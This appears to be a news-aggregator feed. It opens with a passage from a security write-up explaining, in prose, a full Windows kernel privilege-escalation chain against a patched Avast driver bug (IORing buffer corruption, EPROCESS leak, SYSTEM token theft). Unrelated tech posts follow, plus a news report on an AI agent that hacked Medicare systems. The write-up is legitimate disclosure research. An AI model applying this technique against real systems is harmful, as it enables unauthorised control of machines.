Our plan is to redirect a `RegBuffers` entry to point to a fake `_IOP_MC_BUFFER_ENTRY` structure we fully control in userland. When the kernel performs an I/O operation using that entry, it will dereference our fake structure directly — reading the `Address` field from userland and using it as the r/w target. This is only possible because Windows does not implement SMAP (Supervisor Mode Access Prevention), which would otherwise prevent the kernel from dereferencing a pointer into userland memory.

With this fake entry in place, the two IORing operations become our r/w primitives:

`IoRingReadFile` reads from a file and writes into `RegBuffers[i].Address` — making it our arbitrary kernel write:

`IoRingWriteFile` reads from `RegBuffers[i].Address` and writes into a file — making it our arbitrary kernel read:

Concretely: to perform an arbitrary kernel write to address X, set the `Address` field of the fake `BufferEntry` to X and submit an `IoRingReadFile` operation — the kernel copies the read data directly into the memory at X. To read from address Y, set `Address` to Y and submit an `IoRingWriteFile` operation — the kernel reads from Y and writes the data to the output file, which we retrieve from userland. In both cases, updating the `Address` field in our userland-resident fake entry is all that is needed to redirect the operation.

Spray explanation

The size of a `RegBuffers` allocation is N × 8 bytes for N registered buffers, meaning it can fall in either the LFH or the VS backend depending on the chosen N. For this demonstration we picked a value of N that places the allocation in the LFH, which is sufficient to show the impact of the technique. Since the LFH randomises slot selection within its subsegments, precise placement is not possible — the strategy is therefore to flood the pool with a large number of `RegBuffers` allocations so that, after freeing a subset, the probability of our overflowing buffer landing adjacent to a live one is high enough to be reliable.

We choose N registered buffers such that the `RegBuffers` allocation falls in the same pool bucket as our overflowing `_UNICODE_STRING` buffer (allocated at `Length + 16` bytes). This ensures the freed `RegBuffers` holes are exactly the right size to receive our overflowing allocation, making adjacency reliable.

To reach a state where our heap overflow lands on a `RegBuffers` allocation, we use the following spray strategy. The setup is minimal: one IORing object is required per `RegBuffers` structure we want to position.

The spray itself is straightforward: we allocate a large number of `RegBuffers` structures, free a subset of them to create holes of the right size, then trigger the vulnerability to land our overflowing allocation in one of those holes and corrupt an adjacent entry.

This is how it looks in memory:

1. Allocate a large number of `RegBuffers` structures

2. Deallocate some of them

3. Allocate our unicode string

4. Trigger the corruption at the same time

From there we have a corrupted `RegBuffers` entry — the heap overflow has succeeded and our arbitrary r/w primitive is in place. The next step is obtaining a kernel address to use as the r/w target.

Abusing IORing to get a leak

At this point we have an arbitrary r/w primitive but need a kernel address to target — specifically our own `_EPROCESS` address, which we will use to steal the SYSTEM process token.

The diagram below shows the state of the structures after the corruption:

Since we corrupted the pointer inside `RegBuffers[0]` — redirecting it to a fake `_IOP_MC_BUFFER_ENTRY` that lives in our own process memory — we can modify the `Address` field of that fake entry at any time simply by writing to it from userland. There is no need to trigger the vulnerability a second time.

Our arbitrary r/w primitive is operational, but it requires a target kernel address. Since kernel addresses are randomized and cannot be predicted from userland, we need to leak one — specifically the address of our own `_EPROCESS` structure, which we will later use to manipulate our process token.

While using our registered buffer, the address will be mapped through an MDL. The associated MDL pointer is stored in our BufferEntry structure:

( https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/using-mdls )

1

struct _IOP_MC_BUFFER_ENTRY

A Memory Descriptor List (MDL) is a kernel structure that describes a range of virtual memory by locking its physical pages in place. When the kernel needs to safely operate on a userland buffer — for example, to perform I/O into it — it creates an MDL for that buffer, which pins the underlying physical pages so they cannot be paged out or remapped during the operation. Because the MDL describes a userland address, the kernel needs to track which process owns that memory, so the MDL stores a pointer to the owning process’s _EPROCESS structure in its Process field:


  

In our case, when the corrupted BufferEntry points to a userland address and we trigger an IORing operation, the kernel creates and attaches an MDL to our BufferEntry to map that address. Since the BufferEntry itself now lives in userland (as a result of our corruption), we can simply read its Mdl field directly from our process. We then use our arbitrary read primitive to dereference that MDL pointer and extract the Process field — giving us a valid _EPROCESS pointer for our process, which is all we need to proceed with the privilege escalation.

The leak proceeds in four steps:

(1) `RegBuffers[0]` now points to our fake `_IOP_MC_BUFFER_ENTRY` at a known userland address.

(2) We trigger an IORing operation — the kernel creates an MDL for our userland buffer and writes its pointer into our fake entry’s `Mdl` field.

(3) Since the fake entry is in our own process memory, we read the `Mdl` pointer directly from userland without any kernel primitive.

(4) We set the `Address` field of our fake entry to that MDL address, trigger another operation, and read the `Process` field from the MDL — giving us a valid `_EPROCESS` pointer.

Issues

At this point we have both an arbitrary read/write primitive and a kernel address leak. Before proceeding to the privilege escalation, however, we need to repair the corrupted state — releasing the IORing object without cleanup will crash the system.

ProcessBilled

During our overflow, we corrupted an important field in the pool chunk header: the `ProcessBilled` field, which stores a pointer to the process responsible for the allocation. If left uncorrected, this will trigger a blue screen when the chunk is freed.

The ProcessBilled value is an obfuscated pointer to an `EPROCESS`, this value is computed as follows:

`@EPROCESS ^ ChunkAddress ^ ExpPoolQuotaCookie`

`ChunkAddress` is the address of the corrupted pool chunk header, located at a known negative offset before the `RegBuffers` pointer we already know.

`ExPoolQuotaCookie` is a global kernel value used to obfuscate pool billing pointers; to derive it, we use a second uncorrupted IORing object.

Via our arbitrary read, we read its `RegBuffers` address from the `_IORING_OBJECT` and the `ProcessBilled` value from the preceding pool chunk header. Since we know our `_EPROCESS` address, we reverse the formula: `Cookie = EPROCESS ^ ChunkAddress_clean ^ ProcessBilled_clean`.

We then compute the correct `ProcessBilled` for the corrupted chunk and write it back using our arbitrary write primitive.

With the formula in hand, the remaining step is locating the corrupted IORing object itself in memory so we can apply the fix.

We locate the IORing object by parsing our process handle table, found in the `_EPROCESS` structure, following the same logic as `ExpLookupHandleTableEntry` to retrieve the handle table entry, then using the same formula as in `ExGetHandlePointer` to transform it into an object pointer.

Buffer Entry reference

When we obtain our leak, a reference to our buffer entry located in userland is stored in the kernel which will lead to a crash when the kernel attempts to process it during teardown.

The fix is to release the `RegBuffers` registration. This causes the kernel to clean up the associated MDL as part of teardown, resolving the lingering reference. Releasing the MDL directly would not be sufficient — the MDL release is a consequence of releasing the `RegBuffers` entry, not a standalone action. However, releasing the registration triggers another issue, covered below.

Free user buffer

As we have corrupted a buffer entry, the kernel will try to release our userland pointer when closing the object.

The solution to this issue is to simply increase the reference count of our fake buffer entry.

This prevents the kernel reference count from ever reaching zero during IORing teardown, so the corresponding release function is never invoked on our userland pointer.

1

struct _IOP_MC_BUFFER_ENTRY

Abuse Arbitrary R/W to get more privilege

To escalate our privileges, we steal the SYSTEM process token. Using our arbitrary read primitive, we walk the `EPROCESS` doubly-linked list to locate the SYSTEM process entry and read its `Token` field. We then use our arbitrary write primitive to overwrite our own `EPROCESS` `Token` field with the SYSTEM token value, granting our process SYSTEM-level privileges.

Conclusion

In this post we demonstrated a full local privilege escalation exploit against an up-to-date Windows 11 system, leveraging CVE-2025-13032 — a double-fetch vulnerability in Avast’s kernel driver. Starting from a controlled heap pool overflow in PAGED_POOL, we used the RegBuffers array of the IORing object as our corruption target, turning a single overwritten pointer into an arbitrary kernel read/write primitive. From there, we leaked an _EPROCESS pointer via the MDL attached to our corrupted BufferEntry, repaired the pool allocation header to avoid a crash on teardown, and completed the privilege escalation by stealing the SYSTEM process token.

CVE-2025-13032 has since been patched. We encourage all users to ensure their Avast installation is up to date. The full disclosure timeline is detailed in Part 1 of this research.

If you missed the first part of this research, which covers the vulnerability discovery and sandbox escape, you can find it here: CVE-2025-13032 — Entering and Breaking the Avast Antivirus Sandbox (Part 1) .

The Efficiency-Throughput Gap with GitHub Copilot

Hacker News
cacm.acm.org
2026-09-25 03:02:09
Comments...
Original Article

Why have I been blocked?

This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

What can I do to resolve this?

You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Every package is already installed

Lobsters
fzakaria.com
2026-09-25 02:39:43
Comments...
Original Article

tl;dr; omnibin is a FUSE filesystem that puts every binary nixpkgs ever shipped on your $PATH . Nothing is installed. Nothing needs building. 0 bytes on disk until something actually reads a file. 😈

It’s 2026, why am I still installing packages individually? 1 1 Yes, I am a little inspired after watching DHH’s keynote at RailsConf 2026 . I feel the same way about package management.

dhh yelling about how little he is doing

Why must I go through the ritual of adding a package to my configuration.nix , running nix-shell or succumb to the hellscape of nix-env -iA .

Nix gives us the power of having packages installed side-by-side without conflict. Why do I have to pick which ones I want to install?

Why can’t I just have them all?

What if the machine just had all of them?

$ nix run github:fzakaria/omnibin
omnibin: tree at /run/user/1000/omnibin, cache at /home/you/.cache/omnibin

$ ls /omnibin/bin | wc -l
51468

$ python3 --version
Python 3.14.6

$ python3@3.6.2 --version
Python 3.6.2

That is over fifty thousand 2 2 There are actually 881,933 binaries in the tree, but ls /omnibin/bin only lists the latest version of each binary. The versioned forms are still available, but they are not listed. top-level binaries available on my $PATH , from 2013 to 2026 built by Nixpkgs , available on-demand, without installing anything.

oprah shouting you get every version

This is the magic 🧙‍♂️ of Nix , but it’s not restricted to Nix.

Everyone seems to still love Docker and OCI , why am I still picking which base image to use? Why can’t I just have them all?

# syntax=docker/dockerfile:1
FROM fmzakari/omnibin:latest

COPY <<'SH' /demo.sh
python3@3.6.2 -c 'import sys; print(sys.version.split()[0])'
jq --version
gcc@10.2.0 --version | head -1
SH

CMD ["bash", "/demo.sh"]

Is this the ultimate agent harness? It’s a container with everything in it, right from the start. Try it at fmzakari/omnibin .

$ docker build -t example .
$ docker run --rm --device /dev/fuse --cap-add SYS_ADMIN example
3.6.2
jq-1.8.1
gcc (GCC) 10.2.0

Of course, I cannot forget our NixOS friends. You no longer have to curate your environment.systemPackages or home.packages , you can just have them all.

{
  imports = [ inputs.omnibin.nixosModules.default ];
  services.omnibin.enable = true;
}

What is “package management” if every package is already installed?

§ What is this sorcery?

Turns out that Hydra writes a .ls file next to every single narinfo on cache.nixos.org that describes the contents of the archive as JSON:

$ curl -s --compressed https://cache.nixos.org/3n4qphl9s728sz8frmpqqrv9b1m87g68.ls | jq
{
  "root": {
    "entries": {
      "bin": {
        "entries": {
          "python3": { "target": "python3.14", "type": "symlink" },
          "python3.14": { "executable": true, "size": 14264, "type": "regular" }

That metadata turns out to be the perfect index for a FUSE filesystem that can lazily fetch the NARs from the cache and unpack them on-demand. 🤓

None of this would mean anything without nixpkgs-multiverse , which already resolves any (attribute, version) in nixpkgs history to the store path Hydra built for it on cache.nixos.org .

When you combine the two, you get a filesystem that can answer the question “where is python3@3.6.2 ” and then fetch it from the cache and unpack it for you, all without ever having to install it.

I crawled all of it the .ls files in under twelve minutes. 🤯

Once you have that, the filesystem writes itself:

$ ls /nix/store/2lb6nn8ivk1alhckv43n7734lqwbw7h9-python3-3.6.2/bin
2to3      idle     pydoc     python   python3.6         python3-config  pyvenv
2to3-3.6  idle3    pydoc3    python3  python3.6-config  python-config   pyvenv-3.6
          idle3.6  pydoc3.6           python3.6m        python3.6m-config

That is CPython 3.6.2, from 2017. That ls downloaded nothing , it is answered from the pre-crawled index.

§ Do not ls the tree

Agents are “a thing”. Making them useful is a thing. Making them useful without installing anything is a thing.

If your agent tried to ls /omnibin/bin and stat every single entry, it would have a really bad time. There are 881,933 binaries in the tree, and it would take a long time to stat them all.

zoolander meme of saying how hot agents are

To help the agents out a bit, ls /omnibin/bin lists only the bare names, one per executable, each resolving to the newest package that provides it.

The versioned forms all resolve, but they are not listed. For example, python3 resolves to the latest Python 3, which is 3.14.6 at the time of writing, but python3@3.6.2 resolves to the 2017 version.

For everything else there is the index, which is sitting right there in the mount:

$ sqlite3 /omnibin/index.db \
    "SELECT attr, version
    FROM bins
    WHERE name = 'python3'
    ORDER BY version"

That UX is a little rough, so you can also use the omnibin CLI to query the index:

$ omnibin which python3
/nix/store/gxzhl7aaiid7zp3y47jqqiq7zg5mqpwp-python3-3.14.6/bin/python3

$ omnibin which --all python3 | wc -l
610

$ omnibin which --all ffmpeg | head -2
ffmpeg@3.1.7  ffmpeg  0.4 MB  /nix/store/0adpc3…-ffmpeg-3.1.7-bin/bin/ffmpeg
ffmpeg@3.2.4  ffmpeg  0.4 MB  /nix/store/nhfgdv…-ffmpeg-3.2.4-bin/bin/ffmpeg

Lastly, there is a /omnibin/README.md whose entire job is to tell whatever is exploring the filesystem to stop exploring the filesystem and query the database instead. 🤖

§ What’s the catch?

At this point it should be obvious, but you pay for this on startup for the first access.

$ time python3@3.6.2 -c 'import sys; print(sys.version.split()[0])'
3.6.2
real    0m2.690s

$ time python3@3.6.2 -c 'print(6*7)'
42
real    0m0.035s

The first run took 2.7 seconds to fetch the NARs and unpack them, the second run was instantaneous because the store paths were already present.

Other than that? Not really, which is pretty amazing.

For any long-lived machine, you would expect your /nix/store to already be warmed up with the packages you need, so the first access penalty is not a big deal.

I remember one of the first things that blew my mind and sold me on Nix, was seeing a demo by @burke on comma . The capability to test a package, at a single nixpkgs revision, without “installing it”; revolutionary! I believe this to be a spiritual successor and I hope to imbue others with the same sense of wonder and amazement that I felt back then as a beacon of the power of Nix.

The repo is at github.com/fzakaria/omnibin .

Please ls responsibly.

Real-Time Telemetry with Eventlog Live

Lobsters
www.well-typed.com
2026-09-25 02:34:27
Comments...
Original Article

Well-Typed are happy to announce Eventlog Live , a program that streams real-time telemetry from any Haskell application to any observability platform that supports the OpenTelemetry protocol, such as Grafana Cloud , Prometheus , or local viewers such as otel-tui and otel-desktop-viewer .

In this blog post, we’ll show a variety of ways to use Eventlog Live. For each showcase, we’ll link to the relevant instructions using Eventlog Live version 0.10.0.0 as well as the script that was used to generate the showcase. If you would like to use Eventlog Live, we recommend following the up-to-date instructions in the README of the latest release of Eventlog Live .

Eventlog Live

Eventlog Live analyses your application’s eventlog and exports it via the OpenTelemetry protocol. Eventlog Live is lightweight , runs side-by-side with your application in only a few megabytes of memory, and requires no instrumentation other than the -threaded and -rtsopts build options. 1 All you need is somewhere to send your data. For instance, if you have a Grafana Cloud 2 account, adding telemetry to your application is as easy as:

# Create a pipe for the eventlog
EVENTLOG_PIPE="/tmp/eventlog.pipe"
mkfifo "${EVENTLOG_PIPE}"

# Start your application
your-application +RTS -l -ol"${EVENTLOG_PIPE}" -hT --eventlog-flush-interval=1 -RTS &

# Start eventlog-live-otlp
OTEL_SERVICE_NAME="your-application"                                              \
OTEL_RESOURCE_ATTRIBUTES="service.instance.id=$(uuidgen)"                         \
OTEL_EXPORTER_OTLP_ENDPOINT="https://otlp-gateway-<YOUR_REGION>.grafana.net/otlp" \
OTEL_EXPORTER_OTLP_HEADERS="Authorization=Basic%20<YOUR_AUTHORIZATION_HEADER>"    \
eventlog-live-otlp --eventlog-file="${EVENTLOG_PIPE}" -hT --eventlog-flush-interval=1

Out of the box, Eventlog Live supports -hT and -hi heap profiles 3 as well as a variety of memory usage metrics, cost-centre stack profiles, log messages, productivity, detailed thread & capability usage traces. Each of these features is showcased below using an example Grafana dashboard. These dashboards can be found in the repository under demo-grafana-cloud/grafana-dashboards and demo/config/grafana-dashboards . Click any showcase for more information.

Logs as Markers

An animated GIF that shows a screen recording of the same Heap Profiles dashboard as under Heap Profiles by Info Table. However, in the configuration options a switch labelled UserMarker is enabled and the field labelled Filter UserMarker contains the regular expression 'Summing \d+ numbers', and each visualisation shows dotted red lines at the times that correspond to these markers.

The Grafana Heap Profiles dashboard, which shows dotted red lines on each visualisation at the times that correspond to the markers, emitted using traceMarkerIO , that match the regular expression Summing \d+ numbers . This showcase uses the oddball-with-hi example with the Docker Compose setup in demo/docker-compose.yml .

Productivity

An animated GIF that shows a screen recording of a Grafana dashboard called Threads. The dashboard has several configuration options, which let you select the service name and instance ID. For the example, the selected service name and instance ID are 'oddball' and a generated UUID, respectively. The dashboard is configured to show the last 5 minutes of data and refresh every 5 seconds. The dashboard is split into two columns. In the left column, there is a bar chart labelled  'Productivity by Capability', which shows the ratio between executing user code and garbage collection as a percentage, split out by capability and summed over the entire execution. Oddball uses only one capability, Capability 0. From the bar chart, we can see that this capability is about 80% productive during the first few seconds, then nosedives to about 65%, and stays there for the remainder of the animation. In the right column, there is a stacked area graph labelled 'Capability Usage', which shows the capability usage over a sliding window, split out into executing user code (labelled 'Mutator'), garbage collection (labelled 'GC'), and idle time (labelled 'Idle'). While this affirms the image shown by the previous visualisation, it reveals that oddball is idle the vast majority of the time.

The Grafana Threads dashboard, which shows the cumulative productivity per capability, as well as the overall productivity over a sliding window. This showcase uses the oddball-with-pipe example with the Docker Compose setup in demo/docker-compose.yml .

Thread & Capability Usage

A screenshot that shows the Grafana Trace Explorer, which is currently exploring a thread usage trace for thread 3. Each span is listed with its type (either Running or Blocked) and its duration. One particular span is selected, which unfolds the entry and reveals more information. Notably, it reveals that thread 3 was blocked during this span due to a foreign function call.

Eventlog Live’s OTLP exporter is configured using OpenTelemetry’s environment variables. The output of eventlog-live-otlp --help has comprehensive documentation on its support for these environment variables . By default, Eventlog Live aggregates telemetry data over 1 second intervals and exports every 30 seconds, but these intervals can be configured for each telemetry signal using configuration files .

Dynamic Control with Eventlog Socket

If you instrument your application with eventlog-socket , you’ll be able to start/stop profiling while your application is running using a REST API, which you can connect, e.g., to buttons on your Grafana dashboard, as we’ve done on the example Heap Profiles dashboard.

Dynamic Control with Eventlog Socket

An animated GIF that shows a screen recording of the same Grafana Heap Profiles dashboard that was described above.  It continues to show the heap profile of the 'oddball' example program.  This recording illustrates the usage of the 'Start' and 'Stop' buttons.   At the start of the recording, the 'Heap Profile' visualisation shows a history of volatile and spiky memory usage.  After a few refreshes, the 'Stop' button is pressed, the message 'Requested Heap Profiling Stop' appears in the top-right corner, and the 'Heap Profile' visualisation flatlines.   A few refreshes later, the 'Start' button is pressed, the message 'Requested Heap Profiling Start' appears in the top-right corner, and the 'Heap Profile' visualisation resumes.  The 'Census' button can be used to request a single heap census, though this isn't shown in the recording.  The visualisations in the right column are unaffected by the 'Start' and 'Stop' button, and continue to update during the entire recording.

Using the buttons on the Grafana Heap Profiles dashboard. When “Stop” is pressed, the heap profile flatlines. When “Start” is pressed, the heap profile resumes. The “Census” button can be used to request a single heap census. For detailed instructions, see Eventlog Live with Eventlog Socket . This showcase uses the oddball-with-hT example with the Docker Compose setup in demo/docker-compose.yml .

Eventlog Socket lets your application write its eventlog over sockets and uses the other direction of communication for control messages. Eventlog Socket’s control protocol is generic. It isn’t bound to any specific application or library. Any library can register its own control commands under its own namespace, 4 using Haskell IO actions as callbacks:

registerMyEventlogSocketSupport = do
  myPackageNamespace <- registerNamespace "my-package-name"
  registerCommand myPackageNamespace (CommandId 1) myCommandCallback1
  registerCommand myPackageNamespace (CommandId 2) myCommandCallback2

Any command that your application registers with Eventlog Socket can be invoked using Eventlog Live’s REST API.

For security reasons, Eventlog Socket’s control protocol and Eventlog Live’s REST API are hidden behind the +control feature flag, which is disabled by default. If you develop a library that (optionally) uses Eventlog Socket’s control protocol, we recommend using the same +control feature flag.

Call-Stack Profiles with GHC Stack Profiler

If you instrument your application with ghc-stack-profiler , you’ll be able to use its lightweight call-stack profiler.

GHC Stack Profiler samples GHC’s runtime call-stack, rather than a virtual cost-centre stack, and writes these samples to the eventlog. Based on our benchmarks , GHC Stack Profiler has virtually no overhead when it’s not running and we observed 2-8% overhead while it was running, compared to GHC’s built-in cost-centre stack profiler, where we observed 54-128% overhead while it wasn’t running and 98-136% overhead while it was running.

If you’ve also instrumented your application with Eventlog Socket, you’ll be able to start/stop GHC Stack Profiler while your application is running using the same REST API, which you can connect, e.g., to buttons on your Grafana dashboard, as we’ve done on the example Call-Stack Profiles dashboard.

GHC Stack Profiler can also be used without Eventlog Live, e.g., by exporting the profiles to speedscope . We’ll discuss GHC Stack Profiler in detail in an upcoming blog post.

Local Viewers

Eventlog Live does not yet include a built-in telemetry viewer, as it was primarily developed to monitor long-running processes in production. We are currently developing a built-in telemetry viewer, but the prototype is not yet ready for publication. In the meantime, some developers may feel that using either Grafana Cloud or the Docker Compose setup in demo/docker-compose.yml is too heavyweight for local development. Fortunately, the OpenTelemetry ecosystem has several lightweight telemetry viewers, such as otel-tui and otel-desktop-viewer , which are general purpose telemetry viewers that use a text and browser-based UI, respectively.

Eventlog Live with otel-tui

An animated GIF that shows a screen recording of a terminal session. The terminal is split into three screens. On the left, taking up the majority of the terminal, is a screen labelled 'otel-tui'. On the right, split vertically, are two screens labelled 'oddball' and 'eventlog-live-otlp'. The 'otel-tui' screen is itself split into three subscreens. A narrow column on the left, labelled 'Metrics', lists all incoming metrics by name. These names correspond to the names described under Heap Profile by Closure Type, except formatted in camel-case and prefixed with 'ghc_eventlog_'. Currently, the metric named 'ghc_eventlog_HeapLive' is selected. The wide column on the right is split vertically. The top row, labelled 'Details', shows the exact structure of the selected OTLP message for the selected metric. The bottom row, labelled 'Chart', shows a text rendering of a line chart that shows the values of the 'ghc_eventlog_HeapLive' metric. This shows a spiky line, which jumps between 10-30MB, though the Y-axis is labelled in bytes rather than megabytes. The 'oddball' screen shows the output of the oddball program, which consists of many lines saying 'Generating X random numbers' and 'Sum: Y' for ever-changing values of X and Y. The 'eventlog-live-otlp' screen shows the debug output of Eventlog Live, which consists of many lines saying '[DEBUG] Received X events.', '[DEBUG] Exported Y metrics.', and '[DEBUG] Exported Z logs.', for ever-changing values of X, Y, and Z.

This showcase uses the oddball-with-otel-tui example with otel-tui version 0.7.4. This example creates a screen session that combines otel-tui with oddball and eventlog-live-otlp .

Future Work

We are currently developing a built-in telemetry viewer that is purpose-built for GHC’s telemetry, with the intention of making Eventlog Live more useful for short development sessions. We’re also planning to create a library for writing structured log messages to the eventlog, expand the analyses supported by Eventlog Live, and expand the Eventlog Socket protocol to permit command arguments. Moreover, we’re always open to suggestions and feature requests from the community.

Acknowledgements

This work has been performed in collaboration with Mercury, who have a long-term commitment to the scalability and robustness of the Haskell ecosystem. Well-Typed are always interested in projects and looking for funding to improve Haskell tools. Please contact info@well-typed.com if we might be able to work with you!


  1. If your application is built with GHC 9.2 or older, it must also be built with -eventlog . Since GHC 9.4, the eventlog is enabled by default. ↩︎

  2. The repository contains a self-contained demo for using Eventlog Live with Grafana Cloud . Unfortunately, as Grafana Cloud changes its user interface frequently, that demo may not be fully up-to-date. ↩︎

  3. Eventlog Live is developed and tested with the -hT and -hi heap profile breakdowns, but the -hm / -hd / -hy / -he heap profile breakdowns should work. The -hc / -hb / -hr heap profile breakdowns require additional support, which is planned but not yet implemented. ↩︎

  4. We strongly recommend using your package name. ↩︎

Lobsters: Rename vibecoding to llms (Greasemonkey script)

Lobsters
greasyfork.org
2026-09-25 01:33:53
Comments...
Original Article

☰

Showing English results only. Show results for all languages.

Publish a script you've written (or learn how to write one )

Remembering Johannes Doerfert

Lobsters
blog.llvm.org
2026-09-25 01:31:56
Comments...
Original Article


It is with great sadness that we share the news of the passing of Johannes Doerfert, on September 17, 2026, at the age of 36, after a battle with cancer. Johannes was one of the most prolific and respected contributors to the LLVM compiler project, and his loss will be deeply felt.

Johannes was born on November 5, 1989. He earned his Ph.D. in computer science from Saarland University in Saarbrücken, Germany, in 2018, where his research focused on applying polyhedral compiler technologies to low-level code. He had been an active LLVM contributor since 2014, working in the compiler design lab of Prof. Sebastian Hack, and became a core developer on the Polly polyhedral-optimization project as early as 2012.

Over the following decade, Johannes built a career at the intersection of compiler research and high-performance computing, most recently as a researcher focused on OpenMP, LLVM, and parallel program optimization.

Contributions to LLVM

Johannes’s worked on many parts of the LLVM Project, and these are just a few of his contributions:

  • The Attributor framework. Johannes designed and championed the Attributor, LLVM’s versatile inter-procedural fixpoint iteration framework for deducing and propagating function and argument attributes across a program. He introduced it to the community at the 2019 LLVM Developers’ Meeting, and it has since become an important piece of LLVM’s interprocedural optimization infrastructure.
  • OpenMP and GPU offloading. Johannes became LLVM’s code owner for OpenMP target offloading in 2021, leading the compiler and runtime support that lets OpenMP programs run efficiently on GPUs across NVIDIA, AMD, and Intel hardware. His work spanned the OpenMP runtime, just-in-time compilation and link-time optimization for target offloading, and techniques for near-zero-overhead GPU execution.
  • Polly and polyhedral optimization. Early in his career, Johannes was a core developer of Polly, LLVM’s polyhedral loop optimization infrastructure, and published research on polyhedral scheduling in the presence of reductions and on optimistic loop optimization.

He authored or co-authored dozens of papers on compiler optimization, automatic differentiation of GPU kernels, performance portability, and OpenMP.

Johannes helped organize EuroLLVM 2017 in Saarbrücken, Germany, the LLVM-HPC workshop at CGO from 2017 onward, and the LLVM events at ISC starting in 2019, helping join together the LLVM and HPC communities.

He was frequently in attendance at the LLVM Developers’ Meeting Newcomer and Community.o sessions. He welcomed newcomers to the LLVM Developers’ Meetings and shared his advice and wisdom on how to get more involved in the project.

Johannes also held LLVM office hours on a weekly basis, where he answered questions on OpenMP, LLVM-IR, interprocedural optimizations, Attributor, workshops, research, and more.

Mentoring the Next Generation

Johannes was a Google Summer of Code mentor for LLVM for several years and helped student contributors on various projects. Here are just a few:

  • 2016
    • Polly as an Analysis Pass in LLVM
  • 2019
    • Improve (function) attribute inference (with Brian Homerding)
    • Improve (function) attribute inference - 2 (with Brian Homerding)
    • Generation of Annotated Sources (with Brian Homerding)
  • 2020
    • Improve Parallelism-Aware Analyses and Optimizations (with Jon Chesterfield)
    • Advanced Heuristics for Ordering Compiler Optimization Passes (with EJ Park and Giorgis Georgakoudis)
    • Improve inter-procedural analyses and optimizations (with Brian Homerding)
    • Advanced Heuristics for Ordering Compiler Optimization Passes - 2 (with EJ Park and Giorgis Georgakoudis)
    • Latency Hiding for Host to Device Memory Transfers (with Jon Chesterfield)
    • Improve inter-procedural analyses and optimizations - 2 (with Brian Homerding)
    • Deduce attributes for non-exact functions (with Brian Homerding)
  • 2021
    • Learning Loop Transformation Heuristics (with Mircea Trofin)
    • Integrate custom derivatives of Numerical Computing routines like BLAS and Eigen into Enzyme (with William Moses and Vassil Vassilev)
    • Improving OpenMP code generation with prediction of runtime parameters (with Jon Chesterfield)
    • Integrate Enzyme into Rust to Provide High-performance Differentiation in Rust (with William Moses)
    • Improve inter-procedural analyses and optimizations (with Jon Chesterfield)
    • Use official isl C++ bindings for polly (with Michael Kruse)
    • Integrating Enzyme into Rust (with William Moses)
  • 2022
    • Non-Determinacy based optimizations in Parallel Programs (with William Moses)
    • Learning loop transformation policy and its effect on RISC-V (with Mircea Trofin)
  • 2023
    • Machine Learning Guided Ordering of Compiler Optimization Passes (with Tarindu Jayatilaka and Mircea Trofin)
  • 2024
    • The 1001 Thresholds in LLVM (with Jan Hückelheim and William Moses)
    • GPU Libc Benchmarking (with Joseph Huber)
    • Statistical Analysis of LLVM-IR Compilation (with Aiden Grossman)
  • 2025
    • Improve Rust-Enzyme Reliability and Compile Times (with Manuel Drehwald and Kevin Sala)
    • LLVM Compiler Remarks Visualization Tool for Offloading (with Jose M Monsalve Diaz and Kevin Sala)

A Decade at the Podium

Besides the countless code contributions, mentorship, and community building, Johannes was a constant presence at US LLVM Developers’ Meetings and EuroLLVM. He spoke at 11 meetings across 11 years (2015–2024) , for at least 26 speaking sessions and even more that he helped author.

Johannes Will Be Missed

Beyond the commits, the talks, and the papers, those who worked with Johannes remember him as a person full of life and a good sense of humor. He is someone who signed his social media bio simply as “LLVM Developer, OpenMP contributor, Beer drinker, not in this order.”

A memorial service will be held on Saturday, October 3, 2026, from 1:00 to 5:00 PM at San Jose Funeral Service in San Jose, California, with a separate service planned in Germany. He is survived by his wife, Xuejin Zhang, his father, Jürgen Doerfert, and other family and friends around the world.

In lieu of flowers, his family has asked that those who wish to honor his memory consider a donation to the LLVM Foundation (either through Everloved or directly), the organization whose mission he spent his career supporting and advancing. A very generous donor has agreed to match 50K in donations in honor of Johannes. If you donate directly to the LLVM Foundation via a DAF, please indicate in memory of Johannes Doerfert.

More details, and a place to share memories and condolences, can be found on Johannes’s memorial page .

‘Wake-up call’: Labor considers changing Australian laws after OpenAI Medicare hack

Guardian
www.theguardian.com
2026-09-25 01:19:40
Expert says Australia’s criminal laws should be clarified to determine how fault is applied to a corporation when its AI agent commits a crimeGet our new political email, free app or daily news podcastThe federal government could change Australian laws if the current legal framework could not respon...
Original Article

The federal government could change Australian laws if the current legal framework could not respond to the unprecedented OpenAI hack of Medicare, ministers have confirmed.

It comes as the prime minister denied accusations from the opposition he had held onto the information before announcing it at the UN general assembly in New York, and said it was released at the first possible opportunity.

“It’s just nonsense … I was informed while I’ve been in New York,” Anthony Albanese told News24 on Friday.

“Imagine if we had said there’s been a data breach, but we don’t know what has been sourced, we don’t know if your personal information is out there, that would have created a great deal of anxiety, which was unnecessary.

“We had to ascertain the facts, and then we made the statements, as a matter of urgency, we also provided briefings to the opposition, as is appropriate.”

Katy Gallagher, the government services minister, said she was informed about the breach on 17 September. Guardian Australia understands she informed the prime minister between Friday 18 and Saturday 19 September.

Albanese left for the United States on the Friday, where he first met with Apple’s executive chairman Tim Cook in California on Saturday morning, before flying to New York that afternoon.

On Friday, the government said the review by spy agency, the Australian signals directorate, would consider whether legislative change was needed after the prime minister revealed an artificial intelligence agent developed by OpenAI hacked Medicare’s statistics website and three other systems in June.

If current laws could not touch the tech giant, they would need updating, environment minister Murray Watt said on Friday.

“There’s now a review of this underway through that task force that we’ve appointed, and one of the things that they’ll be looking at is whether these matters can be referred to the Australian federal police under current Australian law,” he told Channel Seven’s Sunrise program.

“If that is possible to happen, then that will happen. If it’s not possible, then clearly that indicates that we need to change Australian laws, and that’s what we’ll be doing.”

The assistant minister for technology and the digital economy, Andrew Charlton, acknowledged similar incidents would become “more and more prevalent into the future” and the government would need to be prepared.

“That’s why we’re conducting a review of the incident as well as a review of the laws to determine exactly … whether there needs to be legislative change to recognise this type of incident conducted by an AI agent rather than directly by a person or a company,” Charlton told ABC radio.

Anthony Albanese told the Asia Society on Thursday that the incident was a “wake-up call” about the risks of AI, and whether humans would remain in charge of the technology.

“This technology is moving very, very fast, and we need to make sure that we have a responsibility to keep on top of it,” Albanese said.

Labor has announced it would legislate an AI standard, which Charlton said would be informed by the rapid review. The government has said it wants the bill to be introduced by the end of the year.

